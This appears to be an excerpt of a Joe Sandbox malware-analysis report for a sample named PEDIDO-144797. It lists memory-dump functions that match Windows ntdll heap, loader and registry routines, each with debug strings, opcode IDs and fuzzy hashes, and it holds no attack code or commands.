                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32711FE3, 327120BB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                          • API String ID: 0-1239276146
                                                                                                                                          • Opcode ID: f68859c1ba4b0c6bce7f4eb84b213d5337e0c7ca98d7175cdf096e7d61861d0e
                                                                                                                                          • Instruction ID: 3646117fc5d081e83a72be6bfc6f81f903731a0a1f4e7c501bd90d920352cdd5
                                                                                                                                          • Opcode Fuzzy Hash: f68859c1ba4b0c6bce7f4eb84b213d5337e0c7ca98d7175cdf096e7d61861d0e
                                                                                                                                          • Instruction Fuzzy Hash: B8A1CF75A4032D9FDB24CF64CC84B99B3B1BF58354F1002EAD809AB256DB70AE85CF95
                                                                                                                                          Function 3273327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}h2
                                                                                                                                          • API String ID: 0-3451996185
                                                                                                                                          • Opcode ID: 65eeaa265cad10e2c0d52b926309d02bd1577d1acbcef7367bf70289a7800568
                                                                                                                                          • Instruction ID: 895138aece2ca62c0639247803a366ef44a3e1b6e08d2b6a4405d8a2ade9d006
                                                                                                                                          • Opcode Fuzzy Hash: 65eeaa265cad10e2c0d52b926309d02bd1577d1acbcef7367bf70289a7800568
                                                                                                                                          • Instruction Fuzzy Hash: 4D81C17160A350AFE722CB25C840B6AB7E9FF84754F48492DFA419F291DBB4D900CBD2
                                                                                                                                          Function 326AB360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LUg2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                          • API String ID: 0-2262592636
                                                                                                                                          • Opcode ID: 811f98e129aef2ec98d3af934af814cbdac802e930d204954c715ef9b207636c
                                                                                                                                          • Instruction ID: e9fe1fa27ba0529401d90d445668551ecd4317f394c97729eb6876ca0da2e1d2
                                                                                                                                          • Opcode Fuzzy Hash: 811f98e129aef2ec98d3af934af814cbdac802e930d204954c715ef9b207636c
                                                                                                                                          • Instruction Fuzzy Hash: 7D91CCB5A14359CFEB15CFA4D4607AEB7B1FF11368F148199E800AB290DB789E84CF91
                                                                                                                                          Function 326A63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32700EB5
                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32700E2F
                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32700E72
                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32700DEC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                          • Opcode ID: 7f5df920ec1b6e09469d97616ecc7d2ad24c8fc42d86d971373f71406c1b85ce
                                                                                                                                          • Instruction ID: d8d2b5d378269b9bb636bb8b743a4ae3055c8ce6f1a73397ec3fdd59a899f21b
                                                                                                                                          • Opcode Fuzzy Hash: 7f5df920ec1b6e09469d97616ecc7d2ad24c8fc42d86d971373f71406c1b85ce
                                                                                                                                          • Instruction Fuzzy Hash: BC71E0B1904304AFDB50CF14C884B8B7BE9EF857A4F404468FD498B28AD775E988CBD2
                                                                                                                                          Function 326990F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                          • API String ID: 2994545307-1391187441
                                                                                                                                          • Opcode ID: dc35b24f823e04223f004fc9a5fdccc2ca94a27e8479ebe7741f5efe35caeac5
                                                                                                                                          • Instruction ID: 116f5cfc60ec47f3506f53e7f313231edd69178f198c9cd082f2cf1febc33eef
                                                                                                                                          • Opcode Fuzzy Hash: dc35b24f823e04223f004fc9a5fdccc2ca94a27e8479ebe7741f5efe35caeac5
                                                                                                                                          • Instruction Fuzzy Hash: 5F31A136911208EFDB11CB54DC88FDAB7B9FF89770F1440A9E825A7291DB71E940CE61
                                                                                                                                          Function 326E1190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$em2
                                                                                                                                          • API String ID: 0-4201897154
                                                                                                                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                          • Instruction ID: 3216496c3e9694c588491e65a7344d9ce0e116d776f835d34565bee0cc384b7e
                                                                                                                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                          • Instruction Fuzzy Hash: CD31D172901209BFDB11CB94CD40EDEBBB9EF84754F004025F916A72A0EB70DE45DB94
                                                                                                                                          Function 326A7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: a707d2e1079f4584ce5d82c9af7019bb0c09d1b577a863031934c154e0b4d9a3
                                                                                                                                          • Instruction ID: 17565448029cdeab02245b87e438bbc42d2d3e15bf07b54549fc424835f230de
                                                                                                                                          • Opcode Fuzzy Hash: a707d2e1079f4584ce5d82c9af7019bb0c09d1b577a863031934c154e0b4d9a3
                                                                                                                                          • Instruction Fuzzy Hash: 4151F1B4A00715EFEB0ADF64C864BADB7F1BF44755F108169E4029B290DBB49D15CF81
                                                                                                                                          Function 32733608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                          • API String ID: 0-1168191160
                                                                                                                                          • Opcode ID: f0c6641b916d0ec077d7448c41d61a4e4f7948b45dfcc865ac833f351398c08e
                                                                                                                                          • Instruction ID: eda6b7b10094f68cc1a73ce84803f531199a42b028c2b61a659a58dde39cb5de
                                                                                                                                          • Opcode Fuzzy Hash: f0c6641b916d0ec077d7448c41d61a4e4f7948b45dfcc865ac833f351398c08e
                                                                                                                                          • Instruction Fuzzy Hash: 4CF181B5A022298BDB32CF14CC80BD9B3B5BF44754F4840D9DA09AB242DB759E85CFD9
                                                                                                                                          Function 326A1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 326A1648
                                                                                                                                          • HEAP: , xrefs: 326A14B6
                                                                                                                                          • HEAP[%wZ]: , xrefs: 326A1632
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                          • Opcode ID: e019d185bd2892f12cc8cbb39bcef037bc8d3e79f9c02676af30ec27d2667191
                                                                                                                                          • Instruction ID: 7ea1f524d6fdca042e4169497fc24e060ea1ef3de3e672e93ff32b52a3a9bf0a
                                                                                                                                          • Opcode Fuzzy Hash: e019d185bd2892f12cc8cbb39bcef037bc8d3e79f9c02676af30ec27d2667191
                                                                                                                                          • Instruction Fuzzy Hash: 95E1E2B4A043459FEB19CF68C4607BABBF5EF48704F14889DE896CB285EB34E941CB50
                                                                                                                                          Function 326CF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • RTL: Re-Waiting, xrefs: 32710128
                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 327100C7
                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 327100F1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                          • Opcode ID: a1ede004cbb0bdab92b16ee1bc93a57fd032c45d5c610d58ce241175ab304fed
                                                                                                                                          • Instruction ID: c66ae16e0b5803a907a6bed389edbb422fd01b57c2a82ae7ac848e359cd4f94e
                                                                                                                                          • Opcode Fuzzy Hash: a1ede004cbb0bdab92b16ee1bc93a57fd032c45d5c610d58ce241175ab304fed
                                                                                                                                          • Instruction Fuzzy Hash: 4CE1DF74608741DFE715DF28C880B0AB7E5FF84368F200A1AF9A58B2E0DB74E945CB42
                                                                                                                                          Function 3272330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                          • API String ID: 0-2391371766
                                                                                                                                          • Opcode ID: 4ffe81898fda75c8f4f4264c8096a39ffb36577a048343bfbf4dcb816f773a9b
                                                                                                                                          • Instruction ID: 61ceff91a13b53c618a5d405132510e07d75147c5681aa26b29798b8a11b8dfb
                                                                                                                                          • Opcode Fuzzy Hash: 4ffe81898fda75c8f4f4264c8096a39ffb36577a048343bfbf4dcb816f773a9b
                                                                                                                                          • Instruction Fuzzy Hash: A1B1AAB2605345AFE311CF54C980F6BB7E9BF48754F400929FA41AB290DBB0E949CB96
                                                                                                                                          Function 3269A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                          • API String ID: 0-2779062949
                                                                                                                                          • Opcode ID: a56469d19f25f09cbbecc7e7ab957ee0bbd3c65104ba1adac7de822691e3b355
                                                                                                                                          • Instruction ID: 1debd9fd2c262c261d77b14594c4e4cf08e5754f66cc86c108422e7a0b954961
                                                                                                                                          • Opcode Fuzzy Hash: a56469d19f25f09cbbecc7e7ab957ee0bbd3c65104ba1adac7de822691e3b355
                                                                                                                                          • Instruction Fuzzy Hash: 07A19D75901269ABDF21DF24CC88BDAB3B8EF08714F1005EAE909A7250DB769EC5CF54
                                                                                                                                          Function 3277B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3277B3AA
                                                                                                                                          • TargetNtPath, xrefs: 3277B3AF
                                                                                                                                          • GlobalizationUserSettings, xrefs: 3277B3B4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                          • API String ID: 0-505981995
                                                                                                                                          • Opcode ID: c792f80d76de275bd38c27e01dc9959239ba0528334a08c3541f6b68b71af7cb
                                                                                                                                          • Instruction ID: 7b0735f80ba546e26d8549e561515b09db7cbf3d91124dfe12ff39da87c30ba5
                                                                                                                                          • Opcode Fuzzy Hash: c792f80d76de275bd38c27e01dc9959239ba0528334a08c3541f6b68b71af7cb
                                                                                                                                          • Instruction Fuzzy Hash: BC618C72941228ABDB21DF58DC98BEAB7B9FF14714F4101E5E908AB250CB74DE84CF94
                                                                                                                                          Function 3269F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • HEAP: , xrefs: 326FE442
                                                                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 326FE455
                                                                                                                                          • HEAP[%wZ]: , xrefs: 326FE435
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                          • API String ID: 0-1340214556
                                                                                                                                          • Opcode ID: 8e2fc2d87aa3236dcd6b93055bb06d9f10f5fb68304056c254279c3264519cd1
                                                                                                                                          • Instruction ID: bc038c00efb02b309a0828b255c4dad2466e62d6564bbba17eb62e8d2414bcd3
                                                                                                                                          • Opcode Fuzzy Hash: 8e2fc2d87aa3236dcd6b93055bb06d9f10f5fb68304056c254279c3264519cd1
                                                                                                                                          • Instruction Fuzzy Hash: ED514736604784FFEB06CBA8C984F9ABBF8FF05744F0440A5E9508B292DBB5E941CB51
                                                                                                                                          Function 3274D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3274D7B2
                                                                                                                                          • HEAP: , xrefs: 3274D79F
                                                                                                                                          • HEAP[%wZ]: , xrefs: 3274D792
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                          • API String ID: 0-3815128232
                                                                                                                                          • Opcode ID: 683692848ec5ffc02ffb4f63fb9927771230083e934d83e8f0ef11e073a9e7ea
                                                                                                                                          • Instruction ID: 5a4bfefd17d4c14341ef65cdaf5f4e1160c6f1040ed88b68fd765bba1d8fdfc8
                                                                                                                                          • Opcode Fuzzy Hash: 683692848ec5ffc02ffb4f63fb9927771230083e934d83e8f0ef11e073a9e7ea
                                                                                                                                          • Instruction Fuzzy Hash: 8B5100791003518EF366CA29C854B7273E2FF46388F52488EE8D58F681EE76D847DB21
                                                                                                                                          Function 326AA1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 326AA21B
                                                                                                                                          • @Sg2, xrefs: 326AA268
                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 326AA229
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @Sg2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                          • API String ID: 0-3100920191
                                                                                                                                          • Opcode ID: d26100c3d3d98e413c6be0d3fe5a75b0bdbbd7344643c91584f129743338d6a2
                                                                                                                                          • Instruction ID: ec4192dc52fd9ac249995c00c157969330a578a0657901fd98a487bcadcfa7b3
                                                                                                                                          • Opcode Fuzzy Hash: d26100c3d3d98e413c6be0d3fe5a75b0bdbbd7344643c91584f129743338d6a2
                                                                                                                                          • Instruction Fuzzy Hash: 54419BB5A00784DBEB05CF99C8A0B5977B5FF85744F2480A6EC10AB2A1EB76DD50CB11
                                                                                                                                          Function 3272B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • GlobalFlag, xrefs: 3272B30F
                                                                                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3272B2B2
                                                                                                                                          • @, xrefs: 3272B2F0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                          • API String ID: 0-4192008846
                                                                                                                                          • Opcode ID: cb216f4ab5526001fa97af9523e48d9c1fcf6e8c9531b6251581d836ebe92bf5
                                                                                                                                          • Instruction ID: 6551387f1fde145a1e5bab793cfc91da7520ecc13f76df55848e4c61ef5fdc03
                                                                                                                                          • Opcode Fuzzy Hash: cb216f4ab5526001fa97af9523e48d9c1fcf6e8c9531b6251581d836ebe92bf5
                                                                                                                                          • Instruction Fuzzy Hash: 7C315CB1E00209AFDB10DF94DD84BEEBBBDFF44744F401469E605AB141DBB49E049B94
                                                                                                                                          Function 326B51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$@
                                                                                                                                          • API String ID: 0-149943524
                                                                                                                                          • Opcode ID: 914c5caff4ac6f4d54f7ba16cb8f15f6f8f72fed1c8ed7dd663492ed86e02180
                                                                                                                                          • Instruction ID: 6c5a783e62b267513e1370aa5f618588431e947b38b3884532ffb999a7d38a0f
                                                                                                                                          • Opcode Fuzzy Hash: 914c5caff4ac6f4d54f7ba16cb8f15f6f8f72fed1c8ed7dd663492ed86e02180
                                                                                                                                          • Instruction Fuzzy Hash: 0F32A1B55083518BDB24CF16C4A07AFB7E2FF88748F50892EF9859B290EB74D944CB52
                                                                                                                                          Function 326A5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: b88ac8f9ef9fc0ddc5f7ea4c5c7514c1403fd67f42f2f80063501b1ab59095f7
                                                                                                                                          • Instruction ID: 9997f7f752dcdfd9b7b0fd469a8d9a44ab8bb3b9974fbc713a441cc9fbc80d75
                                                                                                                                          • Opcode Fuzzy Hash: b88ac8f9ef9fc0ddc5f7ea4c5c7514c1403fd67f42f2f80063501b1ab59095f7
                                                                                                                                          • Instruction Fuzzy Hash: C2319275601B12EFEB4ADB68C960B8AFBB6BF44754F105115E90147A60DBB0EC21CFD4
                                                                                                                                          Function 3271E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
